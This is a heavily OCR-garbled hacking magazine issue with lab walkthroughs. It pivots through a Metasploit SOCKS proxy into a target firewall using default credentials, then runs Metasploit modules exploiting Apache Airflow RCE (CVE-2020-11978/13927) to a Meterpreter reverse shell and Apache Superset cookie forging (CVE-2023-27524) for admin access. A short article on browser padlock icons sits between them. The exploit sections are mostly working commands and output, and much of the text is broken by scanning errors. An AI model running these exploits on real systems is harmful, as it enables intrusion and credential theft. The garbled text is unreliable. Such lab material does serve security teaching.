A proxy serveri saserverthatactsasagatew ay betw eenthelocalnetw ork and W ideAiea
N etw ork (int hiscase). So, if Irun aProxy Server, itw il
lactasagatew ay betw een the
(192.168 .222.X) (t o localnetw ork and my attackersyst emsnetw ork (192.168 .110.X)) through the
routew ealready added.
L et'ssee itpractical ly. MetasploithasaSOCK S proxy servermodule (Seri ously, i sthere anything
Metasploitcannotdo).
m sf6 post(
wtndows/gather/credenttals/opera} > search socks

M atchi
ng M odul
es

# Name D isclosure D at
e R ank Check D escription

0 aux iltary/server/|soL ksproxy

norm al No |SOCKS P roxy S erver
1 au xiliary/server/lsocks_ unc
norm al No SOCKS P roxy UNC P ath R edirection
2 au xiliary/scanner/http/^ B ks|o_ traversal 2 01 2 -03 -1 4
norm al No S:>< kjo M usi
c H ost S erver 1 .5 D irectory Trav
ersal

7 washooked in beforehacking waseven illegaT.-K evin M itnick

m sf6 post( wtndows/gather/credenttals/opera) > use 0
m sf6 au xiliary(
server/socks_ proxy) > show options

M odul
e opti
ons (
au xiliary/server/socks_ proxy):

Name Current S ettin R equi

red D escription
g

SR VHOST 0.0.0.0 yes The local host or net

work interface to lis
ten on. Thi s must be
an address on the loc
al machi ne or 0.0.0.0
to listen on all add
resses.
SR VPOR T 1 080 yes The port to listen on
VER SION 5 yes The SOCKS version to
use ( Accepted: 4a, 5)

W hen VER SION ts 5:

Name Current S ettin R equi

red D escription
g
PASSW OR D no P roxy password for S
0CKS5 listener
USER NAME no P roxy username for S
0CKS5 listener

Au xiliary action:

m sf6 au xiliary(server/socks_ proxy) > run

[*] A u xiliary module running as background job 0.
m sf6 au xiliary(server/socks_ proxy) >
[*] S tarting the SOCKS proxy server
 N ow , al
lw ehave t
o do i
sconnectto thisProxy Serveron 127 .0.01:108 0). N ote thatt
hisProxy
Serverusestheroute added by the autoroutemodule earliertorelay thedatato us. Iopen abrow
-serad changei t
ssett
ingsto connectthrough aproxy._____________________________________

Network Settings
Confi
gure how Fi
refox connects to the i
nternet. Learn m ore S etti
ngs...

Connecti
on S etti
ngs

Confi
gure P roxyAccessto the I nternet
No proxy

O Auto-detectproxy settings forthi

s network

C Use system proxy setti

ngs

O M anualproxy configurati
on

H TTP P roxy P ort

Uk I P-* I I J a p

H ilf'S P roxy Port

P ort

Autom ati
c proxy configurati
on UR L

R el
oad

H el
p Cancel OK

In someinstances, Q NA P Cryptransomwaregroup thatfocusseson NetworkA ttached

S torage (NA S ) devices, exploded authentication methodst
oestablish a S O CK S 5 proxy
connection.
 Connecti
on S etti
ngs

Confi
gure P roxyAccessto the Internet
No proxy

Auto-detectproxy setti
ngs forthi
s network

Use system proxy setti

ngs

M anualproxy confi
gurati
on

HTTP P roxy P ort 0

Al
so use thi
s proxy forHTTPS

HTTPS P roxy P ort 0

SO CKS H ost 1 2 7 .0.0.1 P ort 1 080

J S O CKS V4 U SO CKS yb

Autom ati
c proxy confi
gurati
on UR L

R el
oad

No proxy for
H el
p Cancel OK

N ow , w hen Itypethe IP address<192.168 .223.3= i

nbrow ser, Icanseethe interfaceof the
?i
rew al
l. R ememberthatthisFirew allbelongsto t hetargetnetw ork and w ecaneasi lyloginsince
vealready know thecredentials.
-> 0 (
2) O (
J 1 9 2 .1 6 8.2 2 3 .3 |

KalUnux > Kal

iTool
s * Kaboocs \ can rorum s NetH untef * E xpl
oit-00 G oogl
e H acki
ng 08 O ffSec

Logi
n to ptS ense

S IG N IN

U sernam e
adm i
n
 0 d 1 9 2 .1 6 82 2 3 3

Kab Li
nux Kal
iTool
s * Kal
iD ocs X Kab Forum s c\ Kal
lNetH unter E xpl
oitD B G oogl
e H acki
ng D B O ftSec

S ystem * VPN * S tatus * D i

agnosti
c!; * Hel
p♦

W AR NING The adm tn accountpassword i

s setto the defaul
tval
ue Change the password i
n the UserM anage

S tatus/

N ptg ate S ervices And S upport

Name pf Sense hom e afpa

Contracttype
User adm oj)1 9 2 1 6 8 2 2 3 6 (
localD atabase)

S ystem VM ware Vi
rtualM achi
ne
Netgate D evi
ce ID 2 d «851 6 fl
blc553 8faB 0
NE TG ATE AND pl
S ense CO M M UNITY S UP P O R T R E S O UR CE S
B IO S Vendor P hoeni
x Technol
ogi
es LTD
Versi
on 6 00
flyou purchased youtpfS ense gateway fi
fewal
lappl
iance from Nei
gate and el
ected
ease D ate W ed Jul22 2 02 0
R el
Com m unity S upportatthe poi
ntof sal
e ori
nstal
led pfS ense on yourown
Versi
on 2 .7 0 R ELEASE (
am d6 4) hardware, you have access to vari
ous com m uni
ty supportresources Thi
sincl
udes
buil
ton W ed Jun 2 8 03 S3 3 4 UTC 2 02 3 the NE TG ATE R E S O UR CE LI B R AR Y
FreeB SD 1 4 0-CUR R E NT
YPu al
so m ay upgrade to a Netgate G l
obalTechni
calAssi
stance Center(
TAC)
S upportsubscri
pti
on w e re aNvays on'O urteam i
s staffed 2 4x7 x3 6 5 and
com m i
tted to del
iveri
ng enterpri
se cl
ass worl
dwi
de supportata pnee poi
ntthati
s
V erw n i
nform ati
on updated atM on D ec 4 8 55 3 8 UTC 2 02 3 £?
m ore than com peti
ti
ve when com pared to others n ourspace
CPU Type I ntel
fR )CoccfTM )i
7 2 6 00 CPU 3 40G H z
• Upgrade YourS upport • Com m uni
ty S upportR esources
AES NtCPU Crypto Yes (
inacti
ve)
Q AT Crypto No • Netgate G lobalS upportFAQ • OfficialpfS ense T raining by Neig stt

---j
Voi
la, L oginsuccessful
. W enow ow ned t
heFi
rew al
ltoo.

Com pany' s Network Fi rewal l

Attacker' s Network Fi rewal l
E xternalIP:1 9 2 .1 6 8.2 49 .1 6 0
E xternalIP:1 9 2 .1 6 8.2 49 .1 59
InternalIP:1 9 2 .1 6 8^ 03 .3
InternalIP:1 9 2 .1 6 8.1 1 0.1

I nternet

AttackerS ystem
IP:1 9 2 .1 6 8.1 1 0.5
Targetsystem
IP Address:1 9 2 .1 6 8.2 2 3 .6
W ehavesuccessfullyperformed L ateralMovementtoo. N ow , w ecansetanyrulesw ew antand
do w hateverw edo. B utfornow , let’sJustvi
ew therulet
hatexposed W indow sXP t
o internet
.

KaiLi
nux Kal
iTool
s • Kal
iD ocs \ Kal
iForum s c Kab NetH untef * E xploit-D B G oogl
e H acki
ng D B

sl
ern
iM I tV ftH f

Fi
rewal
l/ NAT / I ©

>S Li
nked ru k

pfSense Netqate Vi
ew l
icense

The vastm ajority o ushave no idea whatthe padlock icon on our internet
browser is- and it's putting usatrisk

CY B E R SE CUR ITY
FionaCarrol l a numberof q ue stionsabouttheinternet. Some
leaderi nH umanComputerInteraction, ’ardiff3 ^ bachelorsdegree^orabove
and 22% had acoll egecert i
ficate, w hi lethe
Metropolitan IUni versi
ty
remainderhad no furthereducation.
Oneof ourq uest ionsw as: "Onthe loogle
Doyou know w hatthepadlock symboli nyour
Jhromebrow serbar, doyou know w hatt he
internetbrow ser’saddressbarmeans? If not,
you’renotal one. N ew research by mycolleague p adlock i
co n re pre sents/me ans? =
-sand Ishow sthatonly5% of UK adult sunderst Of the 46 3 w h o resp ond ed, 63% stat
ed the y
knew , orthoughttheyknew , w hatt hepadlock
-and thepadlock'ssi gnifi
cance. Thisi sathreat
i<) ouronlinesafety. sy mb ol on the irw eb b row serme an t, but on l
y
7% gavethecorrectmeaning. R espondentsgave
Thepadlock symbolonaw eb brow sersi mply
usarangeof incorrectinterpretations, believing
meansthatthedatabeing sentbetw een t hew eb
serverand theuser’scomputeri sencrypted and amo ng o thertilin gs that the pad lock s
ignified a
securew eb pageorthatthew ebsit ei ssafeand
cannotberead byothers. B utw henw easked
doesn’tcontainany virusesorsuspiciousl i
nks.
peoplew hatt hey thoughti tmeant, w ereceived
Othersbelieved t hesymbolmeansaw ebsit ei s
anarray of incorrectansw ers.
"trustw orthy=, isnotharmful, ori sa"genuine=
Inourstudy, w easked acrosssecti ono 528
w ebsite.
w eb users, aged betw een 18 and 8 6yearsof age,
(C ont'd on nextpag e)
 ■

N otunderstanding symbolsl i
kethepadlock N etscape, tried to outdo each otherw it h faster,
icon, canpose problemst o internetusers. These betterand more uniq ue products. *1Ieraceto b-
include increased security ri sksand simply hind- edistinctmeanttherew asinconsistencybetw een
ering effecti veuseof the technology. products.
Ourfi ndingscorroborateresearch by Google
itself, w ho i nSeptember, replaced thepadlock InternetSafety
iconw it h aneutralsymboldescribed asa<tune
icon=. In doing so, Google hopesto eradicate H ow ever, introducing distinctbrow serdesigns
the misunderstandingsthatthepadlock icon has canlead to userconfusion, misunderstanding
afforded. and afal sesenseof security, especiallyw hen i tis
H ow ever, Google'supdate now raisesthe now w i dely know nthatsuch inconsistency can
q uestion astow hetherotherw eb brow sercomp- breed confusion, and from that, frustrat ion and
aniesw i lljoin forcest o ensure theirdesignsare lack of use.
uniform and intuiti veacrossal lplatforms. Asanexperti nhuman-computerinteraction, i t
isalarmingtome thatsomebrow sercompanies
W eb browserevol ution continueto disregard established guidelinesfor
usability.Inaw orld w here w eb brow sersopen t h
W ithoutadoubt, thebrow ser, w hich i sour edoorsto potentiallygreatersocietalri sksthan
pointof entry t o thew or p f j hu ma n -c o mp ut er 016 offline world’ i s
an ex er n
-Idw idew eb, comesw it h . . . . . crucialto establish a
alotof responsibility i nteraction, iti salarmingt o methatconsistentapproach
onthepartof w eb com-5 0 w e br owsercompaniescontinuet o foraddressing these
panies. It’show w enow _ >»• i » r dangers.
vi tw eb pages, so the di
si sregard establishedguidelinesjor Asaminimum, w e
brow serhasbecome anintegralpartof us ability." need w eb brow sercompaniestojoin
ourdaily l ives. forcesi naconcerted efforttoshield users, orat
It'sintriguingto look back and tracethe thevery l east, heighten theiraw arenessregardin
evolutionof thew eb’sdesignfrom the early g potentialonline ri sks. Thisshould include for­
1990sto w herew earetoday. Creatingsoftw are mulating one unified designacrossthe board
thatpeoplew anted to useand found effecti ve thataffordsanenriched and safeuserexperienc-
w asattheheartof t hi
sevolution. The creation e.
of functioning, sat isfying, and mostimportantly,
consistently designed userinterfacesw asanimp­ This
ortantgoalinthe 1990s. In act, there w asa
drivei nthoseearly dayst o createw eb interface
designsthatw ereso consistentand int uitive that A rticle
usersw ould notneed to think too much about
how they w ork.
N ow adays, it’sadifferentst orybecause the first
challengei scentred onhelping people t o think
before they interactonline. Inli ghtof t his, i
tsee­
msbizarre thatthe designof thew eb brow seri n appeared
2023 st illaffordsuncertainty through i t
sdesign.
W orsest ill, thatitisinconsistently presented
acrossi tsdifferentproviders. in
Itcould be argued thatt hisstemsfrom the
brow serw arsof themi d-1990s. 1hat’sw hen the The Conversation
likesof Microsoftand formersoftw arecompany,
 Startingfrom January 12024
I[ackercoolMagazinew i llbe leavingY outube soonas
mostof thevideosw eareposting arebecomingvict i
ms
of "contentviolation" (obviously). W e arefindingi
t
difficultto maintain (li
estandard oIvideosand adhere t o
Y outube'scontentpoli cies.

H ackercoolMagazinew i l
lalso be leaving Pinterest
starting iiom'iiiesamedatementionedabove.
I:vou areibllow ingusany of theabovesocialmedia
channels, w ereq uestyou to shi
fttoourothersocial
mediachannels.

LatestApache M odules

ME TASPL OIT TH IS MON TH

Aft
eralong ti
me, w elcomeback to MetasploitThisMonth. L etuslearnaboutthelatestexploit
modulesof Metasploitand how they farei
nourtests.

Apache Airflow R C E M odule

TAR G E T: Apache Airflow < 1.10.11 TY P E : R em ote

M O D U LE : E xploit AN TI-M ALW AR E : N A
C V E -ID : C V E -2020-11978 + C V E -2020-13927

Apache Airfl ow i
sanopen-source toolthati sused fororchestration o: data pipelinesorw orkflow -
s. W orkflow sand datapipelinesare usefulincreat ingvisualizationsof salesnumbersof the previo
-usday forexample. Iti sused byAdobe, Adgen, Snapp et c.
The above-mentioned versionsof Apache Airfl ow softw arehaveanunauthenticated command
injectionvulnerability. Thisvulnerability i saresultof tw o criticalvulnerabilities. The fi
rstone is
CVE-2020-1197 8 w hich i sanauthenticated command injectionvulnerability i nthe<example_trigg
-er_target_dag=.
The second one i sCVE-2020-13927 vulnerability and t hisisthe defaultsetting of Airflow 1.10.10
thatall ow sunauthenticated accessto Airfl ow E xperimentalR ES'! API. ThisR E ST APIall ow s
anyone to perform maliciousactionsl ikecreatingvulnerable DAG above.
ICombiningtheset w o vulnerabilities, attackerscan perform remote code execution. L et'ssee
how thismodulew orks. W ehavetested t hison Apache Airflow 1.10.10running asadocker
ontainer. Thecompose fileof thiscan bedow nload from theli
nk gi
veninourDow nloadssect
io-
. L et
l ’ssetthetargetfi
rst
. Startthecontainer.
— -( kali® 2 1 2 d )- -/airflow ]
$ docker-com pose up
Creating network "airflow defau lt" w ith the defau lt driver
P u lling x-ai rflow-com m on ( apache/airflow :1 .1 0.1 0)...
1 .1 0.1 0: P u lling from apache/airflow
c49 9 e6 d2 56 d6 : D ownl oadi ng [=========================================
========> ] 2 7 .09 M B /2 7 .09 M B ete
fcd8 fd2 cl41 4: D ownl oad com pl ete
========> ] 2 6 .3 8M B /2 6 .54M B ete
a849 50f3 9 508: D ownl oad com pl ete
] 1 .7 7 4M B /2 .1 8MB
40d9 fd6 9 f2 9 9 : W aiting
57 5a9 0dc441 8: W aiting
b2 d041 4a4eae: W aiting
43 3 7 a8e82 6 e8: W aiting
e3 47 1 0f1 57 f2 : W aiting
alcca2 542 086 : W aiting

FO - Usi ng executor S equentialE xecutor

airflow -w ebserver 1 | [2 02 3 -1 1 -2 6 07 :1 6 :3 7 ,82 5] {dagbag.py:3 9 6 } INF
0 - F illing up the D agB ag from /opt/airflow /dags
airflow -w ebserver 1 | [2 02 3 -1 1 -2 6 07 :1 6 :3 8,02 5] {_ _ init_ .py:51 } IN
FO - Usi ng executor S equentialE xecutor
airflow -w ebserver 1 | [2 02 3 -1 1 -2 6 07 :1 6 :3 8,02 7 ] {dagbag.py:3 9 6 } INF
0 - F illing up the D agB ag from /opt/airflow /dags
airflow -w ebserverl | [2 02 3 -1 1 -2 6 07 :1 6 :3 8,03 0] {_ _ init_ _ .py:51 } IN
FO - Usi ng executor S equentialE xecutor
airflow -w ebserverl [2 02 3 -1 1 -2 6 07 :1 6 :3 8,03 2 ] {dagbag.py:3 9 6 } INF
0 - F illing up the D agB ag from /opt/airflow /dags
airflow -w ebserver 1 | [2 02 3 -1 1 -2 6 07 :1 6 :3 8,041 ] { in it .py:51 } IN
F0 - Usi ng executor S equentialE xecutor
airflow -w ebserver 1 | [2 02 3 -1 1 -2 6 07 :1 6 :3 8,043 ] {dagbag.py:3 9 6 } INF
0 - F illing up the D agB ag from /opt/airflow /dags
airflow -w ebserver 1 | 1 2 7 .0.0.1 - - [2 6 /Nov/2 02 3 :07 :1 6 :41 +0000] "G
ET /health H TTP /1 .1 " 2 00 1 87 "cu rl/7 .6 4.0"
airflow -w ebserverl | 1 2 7 .0.0.1 - - [2 6 /Nov/2 02 3 :07 :1 6 :51 +0000] "G
ET /health H TTP /1 .1 " 2 00 1 87 ”cu rl/7 .6 4.0"

Thetargeti
sready. N ow , load theApache_Airflow _R CE module.
"1'heimportanceof epist
emicsecurityand cybersecurityi snow comparablet
othatof
nationalsecurity^ -R ogerS pitz
msf6 > search airflow

M atchi
ng M odul
es

# Name D isclosure D ate Ra

nk Check D escription

0 exploit/linu x/http/apache airflow dag_ rce 2 02 0-07 -1 4 ex

cellent Yes Apache A irflow 1 .1 0.1 0 - Exampl
e D AG R emote Code Exe
cu tion

I nteract w ith a modul

e by name or index. For exampl
e info 0, use 0 o
r se exploit/linu x/http/apacheairflow dag rce
msf6 > use 0
[ Usi ng configured payl oad cm d/u nix/python/m eterpreter_ reversetcp
|msf6 ex ploit(
linu x/http/apache_ airflow _ dag_ rce) > show options

M odul
e options (
exploit/linu x/http/apache airflow dag rce):

Name Current S etting R equi

red D escription

D AG PATH /api/experim enta yes P ath to vu lnerable examp

l/dags/exam ple t le D AG
riggerta rgetda
g
P roxi
es no A proxy chai n of form at
type:host:port[,type:hos
t:port] [...]
R HOSTS yes The target host( s), see
https://docs.m etasploit.
com /docs/using-m etasploi
t/basics/u sing-m etasploi
t.htm l
R POR T 8080 yes Apache A irflow webserver
defau lt port (
TCP)
SSL false no Negotiate SSL/TLS for ou
tgoing connecti ons
TAR G ETUR I yes B ase path
TIM EOUT 120 yes How long to w ait for pay
load execution ( seconds)
VHOST no HTTP server virtu al host
 34
P ayl
oad options {cm d/unix/python/m eterpreter_ reverse tcp):

Name Current S etting R equi

red D escription

LHOST yes The listen address (an interf

ace may be specified)
LPOR T 4444 yes The listen port

E xploit target:

I d Name
—— ——■■»
0 Uni x Command

Setal
lthereq uired optionsand seei
f thetargeti
sindeed vulnerable.
msf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > set rhosts 1 9 2 .1 6 8
.1 6 .2
rhosts => 1 9 2 .1 6 8.1 6 .2
m sf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > check
[*] 1 9 2 .1 6 8.1 6 .2 :8080 - The target appears to be vu lnerable.
msf6 ex ploit( linu x/http/apache airflow dag rce) > |

hetargeti
sindeed vulnerable. Aft
ersett
ing al
ltheoptionsexecute the module.
msf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > set I host 1 9 2 .1 6 8.
1 6 .1
I host => 1 9 2 .1 6 8.1 6 .1
msf6 ex ploit( linu x/http/apacheairflow _ dag_ rce) > run

[*] S tarted reverse TCP handler on 1 9 2 .1 6 8.1 6 .1 :4444

[*] R unning autom ati c check ( "set AutoCheck false" to disable)
[+] The target appears to be vu lnerable.
[*] E xecuti ng TAR GET: "Uni x Command" w ith PAYLOAD : "cm d/unix/python/
m eterpreter reverse tcp"
[+: S uccessfully created D AG: Created < D agR un exampl e trigger target
dag @ 2 02 3 -1 1 -2 6 07 :1 9 :3 6 +00:00: manual _ 2 02 3 -1 1 -2 6 T07 :1 9 :3 6 +00:00,
externally triggered: True>
[*] W aiting for S chedul er to run the vu lnerable D AG. Thi s mi ght take
a w hile...
[+) The target appears to be vu lnerable.
E xecuti ng TAR G ET: "Uni x Command" w ith PAYLOAD : "cm d/unix/python/
m eterpreter reverse tcp"
[+] S uccessfu lly created D AG: Created < D agR un exampl e trigger target
dag @ 2 02 3 -1 1 -2 6 07 :1 9 :3 6 +00:00: m anual_ _ 2 02 3 -ll-2 6 T07 :1 9 :3 6 +00:00,
externally triggered: True>
[*] W aiting for S chedul er to run the vulnerable D AG. Thi s mi ght take
a w hile...
[!] B ash task is not yetqueued...
[!] B ash task is not yetqueued...
[!] B ash task is not yetqueued...
[!] B ash task is not yetqueued...
[*] B ash task is queued...
[+] B ash task is runni ng. E xpect a sessi on if executed su ccessfu lly.
[-] M eterpreter sessi on 1 is not valid and w ill be cl osed
[*] 1 9 2 .1 6 8.1 6 .2 - M eterpreter sessi on 1 closed.
[*] M eterpreter sessi on 2 opened ( 1 9 2 .1 6 8.1 6 .1 :4444 -> 1 9 2 .1 6 8.1 6 .2 :
47 086 ) at 2 02 3 -1 1 -2 6 02 :2 1 :09 -0500

m eterpreter > getu id

S erver username: airflow
m eterpreter > sysinfo
Computer : ab82 02 3 887 42
OS : Linux 5 .1 0.0-kal
i7 -am d6 4 #1 SMP D ebi
an 5 .1 0.2 8 -lka
lil ( 2 02 1 -04-1 2 )
Architectu re : x6 4
System Language :C
M eterpreter : python/linu x
m eterpreter > |

Asreaderscansee, w ehave asuccessfulmeterpretersessionon thetarget.

Apache S upersetP rivesc M odule

TAR GE T: Apache Superset < = 2.0.0 TY PE : R emote
MODUL E : Auxiliary AN TI-MAL W AR E : N A
CV E -ID: CV E -2023-27 524

Apache Superseti sanopen-source softw areapplication thati

sused fordata exploration and data
visualization. The above-mentionedversionsof thesoftw areuse Flash w i
th aknow n defaultsecret
key thati sused tosignH TTP cookies.
These cookieshow evercan easi lyby forged. Attackercan loginto thesit
e, decode itscookie,
settheiruser-id to thatof anadministratorand re-signthecookies. Thiscookiew hich now becom
esavalid cookiecan thenbe used tologinastargeted userand retrievedatabase credentialssave-
d inApacheSuperset.
L et’sseehow t hismodulew orks. W ehave tested t hisonApache Superset2.0.0installed asa
 36
Dockercontainer. L et’ssetthe targetfi
rst
.

$ sudo docker run p 8088:8088 --nanv superset apache/superset:2 .0

.0

sudo: unabl e to resol

ve host 2 1 2 d: Name or service not known
[sudo] password for kali:
S orry, try again.
[sudo] password for kali:
Unabl e to find image 'apache/superset:2 .0.0' locally

)nce, dockerimage i
screated, create ausernamed ‘‘admin=.

exec superset superset fab create-adm i

n \
username admi n \
S uperset \
las Inane Admin \
admin@ superset.com \
password admi n

cated cachi ng backend for production depl oym ents

2 02 3 -1 1 -2 5 06 :50:53 ,51 0:W AR NING:su perset.u tils.cache_ m anager:Fal l
ing
back to the bu ilt-in cache, that stores data in the metadata databa
se, for the follow ing cache: 'FILTER STATE CACHE CO NFIG ' . I t is reco
mmended to use ' R edi sCache' , M emcachedCache or another dedi cated c
achi ng backend for production depl oym ents
Falling back to the bu ilt-in cache, that stores data in the metadata
database, for the follow ing cache: ' EXPLOR EFOR M D ATA CACHE CONFIG '
. I t is recommended to use R edi sCache' , 'M emcachedCache' or another
dedi cated cachi ng backend for production depl oym ents
2 02 3 -1 1 -2 5 06 :50:53 ,51 9 :W AR NI NG :superset.uti
ls.cache m anager:Fal ling
back to the bu ilt-in cache, that stores data in the metadata databa
se, for the follow ing cache: 'EXPLOR EFOR M D ATACACHECO NFIG ' . I t is
recommended to use R edi sCache' , M emcachedCache' or another dedi ca
ted cachi ng backend for production depl oym ents
Create adatabase.
।
— ( kali® 2 1 2 d)-[-1
$ sudo docker exec -it superset superset db upgrade
sudo: unable to resol ve host 2 1 2 d: Name or service not known

W AR NING

A D efault SECR ET KEY was detected, please use superset config.py to

override it.
Use a strong compl ex al
phanum eric string and use a tool to help you
generate
a su fficiently random sequence, ex: openssl rand -base6 4 42

loggi ng was confi gured su ccessfully

2 02 3 -1 1 -2 5 06 :51 :50,3 3 6 :IN FO :su perset.u tils.logging configu rator:l
og

07 e4fdbaba, rm ti m e range endpoi nts from qc 3

slices updated with no tim e_ rangeendpoints: 0
INFO [alem bic.ru ntim e.m igration] R unni ng upgrade ad07 e4fdbaba -> a9
42 2 eeaae7 4, new dataset model s take 2
» Assi gn new UUID s to tables...
» D rop interm ediate colum ns...
INFO [alem bic.ru ntim e.m igration] R unni ng upgrade a9 42 2 eeaae7 4 -> cb
e7 1 abdel 54, fix report schedul e and executi on l og
INFO [alem bic.ru ntim e.m igration] R unni ng upgrade cbe7 1 abdel
54 -> 6 f
1 3 9 c53 3 bea, addi ng_ advanced data_ type.py
R evi sion I D : 6 fl
3 9 c53 3 bea
R evi ses: cbe7 1 abdel 54
Create D ate: 2 02 1 -05-2 7 1 6 :1 0:59 .56 7 6 84
INFO [alem bic.ru ntim e.m igration] R unni ng upgrade 6 fl
3 9 c53 3 bea -> e7
86 7 9 8587 de, D el ete None perm i ssions
INFO [alem bic.ru ntim e.m igration] R unni ng upgrade e7 86 7 9 8587 de -> eO
9 b4ae7 8457 , R esi ze key val ue blob

\ ' w ™ 9 L J

I— $ sudo docker exec superset superset in it

sudo: unabl e to resolve host 2 1 2 d: Name or service not known
 38
2 02 3 -1 1 -2 5 06 :5 3 :1 1 ,8 6 4 :INFO :su perset.secu rity.m anager:S yncing grant
er perm s
S yncing sq l lab perm s
2 02 3 -1 1 -2 5 06 :5 3 :1 2 ,3 3 5 :IN FO :su perset.secu rity.m anager:S yncing sq l I
ab perm s
Fetching a set of a ll perm s to looku p which ones are m issing
2 02 3 -1 1 -2 5 06 :5 3 :1 2 ,8 7 4 :INFO :su perset.secu rity.m anager:Fetching a se
t of a ll perm s to looku p which ones are m issing
C reating m issing datasou rce perm issions.
2 02 3 -1 1 -2 5 06 :5 3 :1 3 ,01 4 :IN FO :su perset.secu rity.m anager:C reating m iss
ing datasou rce perm issions.
C reating m issing database perm issions.
2 02 3 -1 1 -2 5 06 :5 3 :1 3 ,02 1 :INFO :su perset.secu rity.m anager:C reating m i ss
ing database perm issions.
C leaning fau lty perm s
2 02 3 -1 1 -2 5 06 :5 3 :1 3 ,02 9 :INFO :su perset.secu rity.m anager:C leaning fau l
ty perm s

।— ( kali© 2 1 2 d)- -
I— s 1

Il
iet argeti
sready. L oad tl
ieaiixiliary/
gather/
apache_superset_cookie_sig_prive_escmoduleand
load thereq uired opti
ons.
m sf6 > search su perset

M atching M odul
es

# Name D isclosu
re D ate R ank Check D escription

6 au x iliary/gather/apachesu persetcookie sig priv esc 2 02 3 -04-

25 norm al Yes Apache S uperset S igned Cookie P riv Esc
1 ex ploit/linu x /http/apache su perset cookie sig rce 2 02 3 -09 -
06 good Yes Apache S uperset S igned Cookie R CE
2 au x iliary/analyz e/crack webapps
norm al No P assword C racker: W ebapps

I nteract w ith a m odul

e by name or index. For exam pl
e info 2 , use 2 o
r use au x iliarv/analvz e/crack webaoD s

"S ecurit
yused t
obean inconveniencesomet
imes, butnow itsanecessi
tyallt
he
ti
me.
"
 39
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set rho
sts 1 7 2 .1 7 .0.2
rhosts => 1 7 2 .1 7 .0.2
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > check

[- M sf::O ptionV alidateE rror The follow ing options failed to validat
e: USER NAM E, PASSW OR D
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set use
rname adm i n
usernam e => adm i n
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set pas
sword adm i
password => adm i
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set pas
sword adm i n
password => adm i n
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > check
[ 1 7 2 .1 7 .0.2 :8 08 8 - The target appears to be vu lnerable. Apache Su
pset 2 .0.0 is vu lnerable
m sf6 au x iliary( gather/apache_ su perset cookie_ sig_ priv_ esc) > |

t
eral
ltheoptionsareset
, executethemodule.
m sf6 au x iliary(
gather/apache_ su perset_ cookie_ sig_ priv_ esc) > run
[*] R unning m odule against 1 7 2 .1 7 .0.2

[*] R unni ng au tom atic check ( "set AutoCheck false" to disable)

[+] The target appears to be vu lnerable. Apache S upset 2 .0.0 is vu ln
erable
[*] 1 7 2 .1 7 .0.2 :8 08 8 - I n itia l Cookie: session=eyjjc3 Jm X 3 R va2 V u I joiY T
UxM jcl M TQ 4M D l kO G Q 2 O D M 0NTNl ND VjNG U3 YjQ 0O TlmNzcwO W IwZS IsImxvY2 FsZS I6 Im
V u I n0.ZW G aig.I KjrJD h-Y E Y u ng7 N 5 lrR fsu oI Q ;
[*] 1 7 2 .1 7 .0.2 :8 08 8 - D ecoded Cookie: { ,,csrf_ token"=>,,a51 2 7 51 4809 d8d
6 83 453 e45c4e7 b449 9 f7 7 09 b0e", •*locale"= >"enM }
1 7 2 .1 7 .0.2 :8 08 8 - Attem pting login
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Logged in Cookie: session=.eJwl z0FqAzE M heG 7 eD 0
LS ZYsKZcJti X T0tD ATLI qvX sNP cD 3 -N9 P ua8zr49 ye53 vP M r9 M 8qtUKtI0l kQ G bh0VgL
XW KB D W qi 4Q A 0Jt3 W 7 JnVh85B FNNk6 H JS s56 i Yyhl
m d6 qcAg3 YkZgI ufpe8G qYW -xyA0
R R wQ 4Acm wcpR 5nev-en7 l 9 -7 psnM E 2 cD D ol
ll
qcky0X Uwuy9 V8AG 53 eM 5-y03 2 fAo7 yv
P 0tY fv8 A R B Akw.ZW G ai g.E wuKQ 8sm S eqY3 Q M bIP -0fE R -oIM ;
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Found secret key: CHANGE ME TO A COM PLEX R AND O

7 think computervirusesshould countaslife.!think i

tsayssomethingabout
human naturethattheonlyform of lifewehavecreatedsofari spurelydestructive.
W evecreatedlifein ourown image.
-S tephen Hawking
 40
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Found secret key: CH ANG E M E TO ACO M P LE XR AND O
M S E CR E T
[*] 1 7 2 .1 7 .0.2 :8 08 8 - M odified cookie: { H fresh"= >tru e, ,,_ id M =>,,2 6 3 1
2 7 c451 1 4043 c47 2 O 9 7 df07 b56 d7 59 50ad4e6 5a8fcaee3 9 b7 cb2 2 dc85b7 f9 2 7 88ae57
bb7 2 a5c9 6 3 54d546 2 441 042 2 9 4c9 0ad83 81 a6 df2 9 81 1 1 bdd09 2 02 5b8", "csrf_ tok
en"=>"a51 2 7 51 4809 d8d6 83 453 e45c4e7 b449 9 f7 7 09 b0e", M locale"= >"en", "us
er_ id"= >l}
[*] 1 7 2 .1 7 .0.2 :8 08 8 - A ttem pting to resign w ith key: CHANG E ME TO A
CO M PLEXR AND O M SECR ET
•] 1 7 2 .1 7 .0.2 :8 08 8 - New signed cookie: eyJfZnJlc2 giO nR ydW U sI l9 pZC I
6 IjI 2 M zE yN2 M 0NTE xND A0M 2 M 0NzI w0TdkZjA3 YjU2 ZD cl O TUwYW Q 0ZTYl YThm Y2 Fl ZTM
5YjdjYjI yZG M 4NW I 3 ZjkyNzg4YW Ul N2 Ji NzJhNW M 5NjM l NG Q I ND YyND Q xM D Q yM jkO Yzk
wYW Q 4M zgxYTZkZjI 50D E xM W JkZD A5M jAyNW I 4I i wiY3 NyZl 9 0b2 tl
biI6 Im E l
M TI 3 NTE
00D A5ZD hkNjgzND UzZTQ lYzR lN2 I 0ND k5Zjc3 M D liM G UiLCJsb2 NhbG Ui0iJlbiIsI nV
zZX JfaW Q i O j F9 .ZW G ai
g.rtsxg42 a2 3 TUB R l
CR 3 aZW W FZNQ s
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Cookie validated to u ser: adm i n
D one enu m erating databases
A u x iliary m odul e execu tion com pleted
